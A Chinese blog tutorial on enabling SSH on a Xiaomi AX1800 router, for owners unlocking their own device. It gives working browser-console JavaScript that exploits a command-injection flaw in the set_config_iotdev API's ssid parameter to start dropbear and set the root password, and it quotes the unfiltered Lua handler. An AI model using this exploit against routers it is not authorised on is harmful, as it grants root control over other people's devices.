小米AX1800开SSH权限

最新推荐文章于 2025-03-22 16:41:17 发布
原创 最新推荐文章于 2025-03-22 16:41:17 发布
· 1.3w 阅读 · 24 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#路由器

开启SSH

  1. 登录小米路由器后台,注意自己后台的IP地址,一般是192.168.31.1:

在这里插入图片描述

  1. 注意链接上stok:

  1. 按F12,选择Console:
    在这里插入图片描述

  2. 输入以下代码回车:

function getSTOK() {
    let match = location.href.match(/;stok=(.*?)\//);
    if (!match) {
        return null;
    }
    return match[1];
}

function execute(stok, command) {
    command = encodeURIComponent(command);
    let path = `/cgi-bin/luci/;stok=${stok}/api/misystem/set_config_iotdev?bssid=SteelyWing&user_id=SteelyWing&ssid=-h%0A${command}%0A`;
    console.log(path);
    return fetch(new Request(location.origin + path));
}

function enableSSH() {
    stok = getSTOK();
    if (!stok) {
        console.error('stok not found in URL');
        return;
    }
    console.log(`stok = "${stok}"`);

    password = prompt('Input new SSH password');
    if (!password) {
        console.error('You must input password');
        return;
    }

    execute(stok, 
`
nvram set ssh_en=1
nvram commit
sed -i 's/channel=.*/channel=\\"debug\\"/g' /etc/init.d/dropbear
/etc/init.d/dropbear start
`
    )
        .then((response) => response.text())
        .then((text) => console.log(text));
    console.log('New SSH password: ' + password);
    execute(stok, `echo -e "${password}\\n${password}" | passwd root`)
        .then((response) => response.text())
        .then((text) => console.log(text));
}

enableSSH();
  1. 设置ssh登录密码:
    在这里插入图片描述
  2. 未报错即成功注入开启ssh权限了。登录ssh验证:(注意自己路由器后台IP)
    在这里插入图片描述
  3. 跳出fingerprint 输入yes即可。成功登录:
    在这里插入图片描述

分析可注入原因:

api/misystem/set_config_iotdev调用的函数如下:

function setConfigIotDev()
    local XQFunction = require("xiaoqiang.common.XQFunction")
    local LuciUtil = require("luci.util")
    local result = {
        ["code"] = 0
    }
    local ssid = LuciHttp.formvalue("ssid")----参数直接代入,未过滤
    local bssid = LuciHttp.formvalue("bssid")----参数直接代入,未过滤
    local uid = LuciHttp.formvalue("user_id")----参数直接代入,未过滤
    XQLog.log(debug_level, "ssid = "..ssid)
    XQLog.log(debug_level, "bssid = "..bssid)
    XQLog.log(debug_level, "uid = "..uid)
    if XQFunction.isStrNil(ssid)
        or XQFunction.isStrNil(bssid)
        or XQFunction.isStrNil(uid) then
        result.code = 1523
    end
    if result.code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(result.code)
    else
        XQFunction.forkExec("connect -s "..ssid.." -b "..bssid.. " -u "..uid)----参数直接代入,未过滤
    end
    LuciHttp.write_json(result)
end

参数未过滤
所以可以在网址上提交注入开启ssh权限:具体参考上面开启SSH第4步中代码。
这样的方法目前适合ax1800及ax3600某些版本。

小米AX6000SSH后的高级用法
LeeKwen的专栏
07-14 4030
如果AX6000重启则原为admin的密码就变成了默认的小米路由器的密码(需要通过SN算号器来算),可以不用修改密码,我这里是修改了密码也记不住,下次启动照样需要算号。注意点就是看好自己手头的硬件版本是哪一个,小米路由器的下发有对应的型号RA72,还是其他的。先将自动更新关闭掉,否则,下次更新固件版本后,又需要重新运行一下启动ssh的步骤。配置文件需要去购买流量,具体的我不详述,网上一搜都有平台可以买的。此文重点不介绍如何获取ssh和固化的,别人已经写的很详细了。就写到这里吧,主要用于备份,省的忘记了。
支持机(OpenWrt)的路由器大全
热门推荐
Derry的专栏
06-30 8万+
2023年上半年最热门的路由器当然是360T7、小米WR30U这两款,主要是性价比高,闲鱼100多搞定,支持OpenWrt、支持WiFi6,采用MTK798X系列处理器,性能强,轻松跑满千兆,如果你想追新,那就选择这两款。
小米路由器OpenWrt教程
卖泡面的小男孩
06-17 1万+
先把LAN口设置网关为另一个路由器或者光猫的端口,如192.168.1.1,修改当前LAN IP为静态 如192.168.1.2,修改DNS为192.168.1.1,再加一个114.114.114.114,如果光猫或主路由地址为192.168.31.1,则IP DNS网关相应的修改,LAN IP修改后 后续需要使用这个IP登这个路由,不要和其他IP冲突。注意:一定是先按reset再接电源,不然会恢复到小米路由器默认的出厂设置,breed白,又得重复之前的步骤。
小米AX6000解锁ssh避坑笔记
最新发布
dgj8300的专栏
03-22 1376
解锁小米路由器AX6000的ssh功能
WiFI6版本弃子,小米路由器AX1800,通过配置文件永久ssh和ipv6传入网关设置
qq_42686367的博客
08-23 4791
通过配置文件的方式固定小米AX1800ssh和ipv6,达到更新固件重启固件无影响的效果
小米路由器AX1800降级后的SSH登录和关墙等命令
fanqi987的专栏
11-19 2219
6、在定时检测文件中,定稿定时启启用端口的命令。4、放5000端口TCP和UDP连接的命令。5、定时检测命令#crontab -e。1、路由器SSH远程访问。2、更改root登录密码。3、打路由器防火墙。7、重启reboot。
小米路由器ssh 启工具 & 使用方法
KeyBordkiller的博客
01-09 1682
小米路由器ssh 工具下载地址
小米ax1800官方编程器固件
09-21
救砖编程器固件
小米ax3000t ssh
02-20
为了在小米AX3000T路由器上启用并使用SSH连接,需遵循特定的过程来获取访问权限。通常情况下,官方固件并不直接提供SSH功能给用户,因此需要通过第三方脚本或方法实现这一目标。 #### 获取SSH访问权限 对于红米...
小米ax1800编程器固件
01-21
对于小米 AX1800 跤由器,在特定版本范围内能够较为简便地SSH 服务并进行机操作。如果设备的版本号位于 r2080 至 r2106 之间,则可以直接通过简单配置来启用 SSH 功能[^1]。 #### SSH服务 为了准备后续...
小米AX1800WIFI6路由器集客包
11-24
小米AX1800WIFI6路由器集客包
小米AX9000ssh后安装zerotier
03-17
1. **解锁SSH权限** 需先发者模式并获取root权限,可通过小米修复工具或漏洞利用实现。注意不同固件版本解锁方式可能不同。 2. **确认设备架构** 执行命令确认CPU架构: ```bash uname -m ``` 小米AX...
总结京东云 亚瑟 AX1800 PROopenwrt后软件包、下载目录扩容的方法
08-10 9919
了不同的系统总结下不同系统的扩容方法。
路由器OpenWrt固件(超详细包救回)
Linrp的博客
05-14 2万+
按win键搜索安全中心接下来的的操作必须在浏览器无痕模式下操作。
如何小米路由器ssh功能
cdpyx的博客
08-14 1万+
本文只针对小米(Redmi)路由器,其他路由器请另请高明其实在网上有很多把路由器发板后起的方法,但我家路由器恰好没USB,也没发版,这样就离发板远去了我发现了不用发板也可以的方法,就来分享一下。(理论所以机型都能用)例如:以上就是今天要讲的内容,本文仅仅简单介绍了小米路由器启办法,而ssh提供了大量能使我们快速便捷玩路由器。...
小米路由器3openWRT系统的实践过程
adingge的专栏
06-19 3万+
家里有个小米路由器3,一直放在角落吃灰,最近发现这个路由器适合OpenWRT,所以就拿来了一遍。参考了别人的文章,结合自己的实际,所以有这边文章
红米AC2100openwrt以及回官方固件全记录
chenj_freedom的技术点滴
10-03 2万+
访问openwrt官网,我们可以知道一些路由器有漏洞,可以openwrt固件,做一些自定义操作。我openwrt的目的主要是用tc脚本限速,因为我发现路由器本身的限速功能似乎有问题,并不能如你所期地进行限速。机就是替换原厂的固件,,boot类似于pc的bios,用于引导系统,通常我们需要入不死uboot,防止路由器变砖。机的难点在于解锁原厂固件的后台,解锁后就可以随便机了。
一、玩转小米路由器mini之openwrt固件
浅弋、璃鱼的博客
08-26 7万+
这是2016年搞的一个东西,主要是大学里一个学生账号只能使用一台设备登陆,当时手握手机,电脑,平板的我无奈的,但是我是不会向移动这等"恶势力"低头,于是乎,搞事情啊... 所需设备: 电脑一台: 安卓手机一部:装小米无线APP U盘:大于4G 过程步骤; 小米路由器mini(一下用mini代替)需要SSH功能(参考: http://jingyan.baidu.com/artic...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值